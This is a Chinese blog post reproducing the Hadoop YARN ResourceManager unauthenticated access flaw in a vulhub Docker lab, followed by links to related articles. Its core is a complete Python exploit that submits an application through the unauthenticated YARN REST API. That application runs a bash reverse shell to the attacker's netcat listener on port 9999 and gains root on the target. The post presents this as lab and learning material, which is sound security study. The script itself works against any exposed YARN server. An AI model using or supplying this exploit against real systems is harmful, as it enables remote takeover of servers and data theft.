hadoop yarn ResourceManager 页面未授权访问(含命令执行)

最新推荐文章于 2024-06-10 22:42:41 发布
最新推荐文章于 2024-06-10 22:42:41 发布
阅读量587 收藏
点赞数
分类专栏: 漏洞复现 docker 文章标签: hadoop 大数据 分布式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huayimy/article/details/130627216
版权

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

目录

环境搭建

 攻击复现

环境搭建

使用vulhub靶场,用docker启动环境

 

 访问hadoop页面

 攻击复现

1、先去攻击机监听端口

nc -lvvp 9999 #监听本地端口9999

2、再去靶机运行exp python exploit.py获取shell

Poc:

#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = 'x.x.x.x' # 修改lhost反弹shell的IP

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

将此poc更改IP后,放入靶机中,使用python3运行

python3 1.py

 此时攻击机中nc会显示获取到shell,权限为root

 

参考:

https://blog.csdn.net/weixin_44522540/article/details/122583636

huayimu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记录一次vulhub:hadoop yarn ResourceManager 页面授权访问(命令执行)漏洞复现
sszsNo1的博客
06-27 693
vulhub:hadoop yarn ResourceManager 页面授权访问(命令执行)漏洞复现
复现 Hadoop YARN ResourceManager 授权访问
weixin_52766206的博客
08-09 2198
复现 Hadoop YARN ResourceManager 授权访问,更多的是用来练习和熟悉漏洞的,就没安装到太复杂的环境,直接在kali里完成的。
hadoop授权访问命令执行漏洞复现-vulfocus
最新发布
c0529的博客
06-10 541
Hadoop YARN(Yet Another Resource Negotiator)的ResourceManager是集群资源管理的核心组件,负责分配和管理集群资源以及调度作业。如果ResourceManager出现授权访问漏洞,可能允许经认证的用户访问或操作集群资源,这可能会导致数据泄露、资源滥用或拒绝服务攻击。在这个复现中就是在组件的ui界面上出现了授权访问漏洞。
Hadoop YARN ResourceManager 授权访问getshell
09-23
利用Hadoop YARN ResourceManager 授权访问getshell工具以及WORD说明
授权访问Hadoop 授权访问漏洞
qq_68163788的博客
05-20 1114
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadoop-yarn-授权访问漏洞
qq_42735101的博客
06-26 2048
Hadoop是由Apache基金会所开发的分布式系统基础架构,由于服务器直接开放了Hadoop的某些端口而造成了漏洞。本文是docker中的Hadoop-yarn-授权访问漏洞复现。
数据库安全:Hadoop 授权访问-命令执行漏洞.
网络安全领域___专研者.
11-10 3525
Hadoop 授权访问主要因HadoopYARN资源管理系统配置不当,导致可以授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令,最终完全控制服务器。
hadoop-yarn-server-resourcemanager-2.6.0-API文档-中文版.zip
04-23
赠送jar包:hadoop-yarn-server-resourcemanager-2.6.0.jar; 赠送原API文档:hadoop-yarn-server-resourcemanager-2.6.0-javadoc.jar; 赠送源代码:hadoop-yarn-server-resourcemanager-2.6.0-sources.jar; 赠送...
hadoop-yarn-server-resourcemanager-2.7.4.jar
08-06
hadoop2.7.4安装包补丁包,解决yarn定时调度启动问题!!
Hodoop授权访问修复
07-14
"Hadoop授权访问修复"这个话题聚焦于如何确保Hadoop集群的安全性,防止授权的用户访问敏感信息或进行恶意操作。以下是关于这个问题的详细解释和解决步骤。 首先,Hadoop的默认设置允许所有用户访问其服务接口...
Hadoop Yarn 案例 2
07-16
大数据处理领域,Hadoop YARN(Yet Another Resource Negotiator)是Apache Hadoop项目中的一个核心组件,负责管理和调度集群中的资源。YARN大数据处理提供了高效、可扩展的资源管理框架,使得不同类型的计算...
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&授权访问&RCE-漏洞复现
ran的博客
05-05 3146
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
Hadoop YARN ResourceManager 授权访问复现
carrot11223的博客
12-23 410
hadoop授权访问getshell
Hadoop YARN ResourceManager 授权访问
OOOOOK的博客
07-03 1584
Hadoop YARN ResourceManager 授权访问漏洞原理及复现
Hadoop 漏洞复现
MrHatSec的博客
08-01 5905
Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。
Hadoop YARN ResourceManager授权访问漏洞
Kevin's Blog
06-01 5061
文章目录一、介绍1.1 简介1.2 漏洞成因二、模拟环境三、信息收集四、攻击方法五、漏洞防御 一、介绍 1.1 简介   Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。   Apache Hadoop YARNHadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,并调度要在不同集群节点上执行的任务。(独立出的资源管理框架,负责资源管理和调度) 1.2 漏洞成因   负责对资源进行同一管理调度的ReasourceManager组件的
hadoop漏洞_首发预警 | 黑客利用Hadoop Yarn资源管理系统授权访问漏洞进行攻击...
weixin_39731271的博客
12-20 319
4月30日,阿里云发现,俄罗斯黑客利用Hadoop Yarn资源管理系统REST API授权访问漏洞进行攻击。Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处理,YarnHadoop集群的资源管理系统。此次事件主要因Hadoop YARN 资源管理系统配置不当,导致可以授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过R...
Hadoop 授权访问
07-14
hadoop yarn resourcemanager 授权访问是指用户没有足够的权限来访问hadoop yarn resourcemanager。这可能是由于用户没有正确配置或没有正确的身份验证凭据。要解决此问题,您可以检查hadoop yarn resourcemanager的配置文件,确保用户具有足够的权限,并使用正确的身份验证凭据进行访问。如果问题仍然存在,请联系系统管理员以获取更多帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值